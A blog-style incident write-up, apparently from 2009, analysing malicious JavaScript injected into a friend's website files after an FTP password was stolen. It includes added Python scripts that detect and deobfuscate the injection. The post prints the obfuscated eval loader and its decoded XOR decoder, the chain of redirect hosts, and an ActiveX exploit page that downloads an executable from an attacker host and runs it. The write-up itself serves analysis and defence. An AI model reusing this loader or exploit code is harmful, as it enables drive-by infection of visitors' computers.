Not long ago I wrote about a case that directly affected my friends' website, whose code had an attack vector targeting web browsers added to it. A short while passed and similar code showed up at another friend's site, on a completely different server; part two, I presume, aka the sequel :}
First, the code was appended to the end of files with the .html extension (JavaScript) and of .htaccess files (HTML). The infected files were located at most 2 directories deep from the root directory. Unfortunately my friend had no .htm files, so it is hard to say what could have happened to them, but knowing life, exactly the same thing would have happened :]
The code began with a comment in the form of a checksum:
<!-- [ 93cbb7f271e2e60d4c7c2a5ac356c422 ] -->
presumably to check whether the page is infected with the current redirect to the malicious site, and whether the page is infected at all.
The code looked more or less like this:
<script>eval('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x67\x5a\x73\x68\x56\x4e\x41\x28\x68\x6c\x47\x56\x47\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6f\x6c\x6f\x52\x43\x74\x28\x63\x61\x49\x68\x29\x7b\x76\x61\x72\x20\x6d\x49\x6a\x53 (....)
(the full code can be found at the bottom of the post)
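One way to sweep a web root for this kind of injection, added here as an example and not part of the original post: the Python below flags .html, .htm and .htaccess files that contain the bracketed 32-hex-digit marker comment or an eval() over a long run of \xNN escapes. The function names, the 16-escape threshold and the sample tree built in demo() are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Marker that preceded the injected block: an HTML comment holding a 32-hex-digit checksum.
MARKER_RE = re.compile(rb"<!--\s*\[\s*([0-9a-fA-F]{32})\s*\]\s*-->")
# eval() whose string argument starts with a long run of \xNN escapes (threshold is an assumption).
HEX_EVAL_RE = re.compile(rb"eval\(\s*['\"](?:\\x[0-9a-fA-F]{2}){16,}")
TARGET_SUFFIXES = (".html", ".htm", ".htaccess")


def scan_bytes(data):
    """Return a finding dict for one file's content, or None if neither indicator is present."""
    marker = MARKER_RE.search(data)
    hex_eval = HEX_EVAL_RE.search(data)
    if not marker and not hex_eval:
        return None
    start = min(m.start() for m in (marker, hex_eval) if m)
    # The code was appended, so content located after the closing </html> is a strong hint.
    close = data.lower().rfind(b"</html>")
    return {
        "checksum": marker.group(1).decode().lower() if marker else None,
        "hex_eval": hex_eval is not None,
        "offset": start,
        "after_html_close": close != -1 and start > close,
    }


def scan_tree(root):
    """Walk root and return {relative_path: finding} for every flagged target file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TARGET_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    result = scan_bytes(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if result:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                result["depth"] = rel.count("/")  # 0 = directly in the web root
                findings[rel] = result
    return findings


def demo():
    """Build a small constructed web root (harmless content) and scan it."""
    payload = "".join("\\x%02x" % b for b in b"/* constructed, harmless sample */")
    injected = ("\n<!-- [ 0123456789abcdef0123456789abcdef ] -->"
                "<script>eval('%s');</script>" % payload).encode()
    clean = b"<html><body>hello</body></html>"
    files = {
        "index.html": clean + injected,
        "a/.htaccess": b"Options -Indexes\n" + injected,
        "a/b/page.html": clean,
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "a", "b"))
        for rel, content in files.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for path, finding in sorted(demo().items()):
        print(path, finding)
```

Grouping the findings by checksum shows whether all files carry the same version of the injected block.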
After decoding (!), the code looked more or less like this:
function qJN(jRo){
  function uRJLf(aan){
    var uhe=0;
    var zVQ=aan.length;
    var pIUI=0;
    while(pIUI<zVQ){uhe+=sGkS(aan,pIUI)*zVQ;pIUI++;}
    return (uhe+'');
  }
  function sGkS(yzFiG,pGKu){return yzFiG.charCodeAt(pGKu);}
  try {
    var xPvHQ=eval('a)r?gfufmqefnft?sq.)c)a)lfl?exe?'.replace(/[qx\)\?f]/g, ''));
    var udEJq=new String();
    var vSohIZdw=0;vRMTl=0,yXlTqco=(new String(xPvHQ)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
    var fVOv=uRJLf(yXlTqco);
    jRo=unescape(jRo);
    for(var tgQG=0; tgQG < (jRo.length); tgQG++){
      var yLIeGB=sGkS(yXlTqco,vSohIZdw)^sGkS(fVOv,vRMTl);
      var sVIiIh=sGkS(jRo,tgQG);
      vRMTl++;vSohIZdw++;
      if(vRMTl>fVOv.length)vRMTl=0;
      if(vSohIZdw>yXlTqco.length)vSohIZdw=0;
      udEJq+=String.fromCharCode(sVIiIh^yLIeGB);
    }
    eval(udEJq); return udEJq=new String();
  }catch(e){}
}
qJN('%32%39%36%39%37%36%30%30%(.....)
Put very simply, it all once again came down to attempts to attack browsers.
The browser connected to the address:
tuadresdomenykolegi.net.54bc34df74976097.axa3.cn (78.129.166.17)
where it was redirected to:
hxxp://www.google.com.urchin.js.axa1.cn/zob/index.php
where it was redirected to:
hxxp://keyclubs.cn/ad1/index.php
where it was redirected to:
hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/index.php
which returned the code:
<meta HTTP-EQUIV='REFRESH' content='2; URL=javac.php'><script> start();
function z_sa(o,p,v){ o.setAttribute(p,v); }
function start(){
var z = document.createElement('object'); z_sa(z,'id','z'); z_sa(z,'classid',"cKlmshiKd!:mBODm9!6KCO5
O5m6m-h6!5!Ah3h-O1h1KD!0!-h9!8K3mAh-h0m0mCm0K4hFhC!2K9hEO3K6K".replace(/[\!hmKO]/g, ''));
try { var q = z.CreateObject("mDs7x7m1lD27.DXDM1L9H6TDT6P9"
.replace(/[D1796]/g, ''), ''),s = z.CreateObject("SHhuePlHlP.mAPpPpHl@
iHcHaHtHiuomn@".replace(/[H@Pum]/g, ''), ''),t = z.CreateObject("aTdToCdTbT.psptprTeTa9mp".replace(/[y9CpT]/g, ''), '');
try { t.type = 1; q.open("G5E5TO".replace(/[ucC5O]/g, ''),
'http://www.google.com.update.login.jsp.podavanda.cn/IIl/load.php',false);
eval("qg.!sHe!nLd!(L)H;%tL.LoHpLegnL(!)g;Ltg.gWgrLi%tgeL(!qH.!r!eLsgp%oHnLsLe!B!oLd%yL)L"
.replace(/[HLg\!%]/g, '')); var name = ".7/7/D.l.k/7/kaDdlmDi@nD.7e@xlel".replace(/[lD7@k]/g, '');
eval("tz.zSzazv3eVT3ozFfiQlQe3(fnzafmQeQ,z2f)V;3tz.3C3lfofs3eV(z)Q;3".replace(/[Vfz3Q]/g, ''));}
catch(e) {}try { eval("sg.ksYhTeYlJlTeJxTeTcguktJeT(gnkakmYeg)k".replace(/[YJkTg]/g, '')); }
catch(e) {}} catch(e){}}</script></head>
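Both scripts above hide their strings the same way: a literal padded with filler characters that a .replace(/[...]/g, '') call strips at run time. That can be undone statically, without executing anything. The Python below is an added example, not code from the original post; its function names are hypothetical, and SAMPLE is assembled from fragments quoted on this page, with `url` as a placeholder.

```python
import json
import re

# "literal".replace(/[junk]/g, '') with either quote style around the literal.
JUNK_REPLACE_RE = re.compile(
    r"""(?P<q>["'])(?P<lit>(?:\\.|(?!(?P=q))[^\\])*)(?P=q)"""
    r"""\s*\.\s*replace\(\s*/\[(?P<cls>(?:\\.|[^\]\\])+)\]/g"""
    r"""\s*,\s*(?:''|"")\s*\)"""
)


def strip_junk(literal, js_class):
    """Remove the filler characters named by the JS character class from the literal."""
    try:
        return re.sub("[" + js_class + "]", "", literal)
    except re.error:
        return None  # class syntax Python's re rejects: leave the expression untouched


def resolve_junk_literals(source):
    """Return (rewritten_source, recovered_strings); the script itself is never executed."""
    recovered = []

    def _rewrite(match):
        plain = strip_junk(match.group("lit"), match.group("cls"))
        if plain is None:
            return match.group(0)
        recovered.append(plain)
        return json.dumps(plain)  # emit the plain string as a quoted literal

    return JUNK_REPLACE_RE.sub(_rewrite, source), recovered


# Assembled from fragments of the two scripts quoted in this post; `url` is a placeholder.
SAMPLE = r"""
var xPvHQ=eval('a)r?gfufmqefnft?sq.)c)a)lfl?exe?'.replace(/[qx\)\?f]/g, ''));
var q = z.CreateObject("mDs7x7m1lD27.DXDM1L9H6TDT6P9"
.replace(/[D1796]/g, ''), '');
var t = z.CreateObject("aTdToCdTbT.psptprTeTa9mp".replace(/[y9CpT]/g, ''), '');
q.open("G5E5TO".replace(/[ucC5O]/g, ''), url, false);
"""

if __name__ == "__main__":
    rewritten, strings = resolve_junk_literals(SAMPLE)
    print(rewritten)
    for s in strings:
        print("recovered:", s)
```

A literal that the page layout has wrapped across two lines needs to be rejoined before it is fed in, since the line break is not one of the filler characters.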
Of course, just as in the previous post, the server sent data only if the browser announced itself with a suitable User-Agent header, such as MSIE or Opera. A missing or uncommon User-Agent automatically blocked access to the page, and of course nothing was displayed. In addition, a given page could be visited only once, because the server hosting the malicious pages remembered IP addresses and allowed just a single visit. All of this, of course, to reduce the chance of the attack being detected…
In the system logs I found an FTP login to the server hosting the site: the files were downloaded, new data was added, and the files were uploaded back to the hosting server. The action was most likely carried out from some hijacked computer, a bot. After thoroughly grilling my friend, it turned out that the password scheme he used looked more or less like this:
login: hislogin
password: hislogin.hislogin
which confirmed my theory that the account was taken over through mass scanning for simple passwords. As you can see, the method works and is effective :}
Source code:
One comment on
June 23, 2009 at 19:12
Just for information: the trojan placed on the computer from which the login was made forwards the login and password, and then logs in to the server by itself if it does not detect the code. It happened to me that the trojan failed to overwrite the whole file and cut off half of the code.
The bot attacks all files conventionally treated as default documents loaded when visiting an address: index, main, start, default (html|htm|xhtml|xml|php|asp|aspx|etc…); so far it has not happened to me that it attacked .htaccess files.